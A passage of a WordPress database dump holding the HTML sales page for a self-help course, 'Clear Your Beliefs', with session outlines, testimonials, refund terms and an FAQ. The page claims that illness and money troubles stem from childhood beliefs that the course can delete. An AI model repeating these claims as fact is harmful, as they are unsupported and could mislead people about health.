width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(3902, 2346, '_wpb_vc_js_status', 'false'),
(3903, 2346, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(3969, 3224, '_oembed_time_35ce944ad47d7d784631d983834c0114', '1505757433'),
(4042, 3249, '_oembed_66dfaab44bd00a9847cfaa13b3e37c77', '<iframe width="474" height="267" src="https://www.youtube.com/embed/h3DatZ807UQ?feature=oembed" frameborder="0" allowfullscreen></iframe>'),
(4043, 3249, '_oembed_time_66dfaab44bd00a9847cfaa13b3e37c77', '1506606948'),
(4074, 3276, '_oembed_cd8dcb0370926307180c9c733d802fee', '<iframe width="474" height="267" src="https://www.youtube.com/embed/U4DfcOgSjzs?feature=oembed" frameborder="0" allowfullscreen></iframe>'),
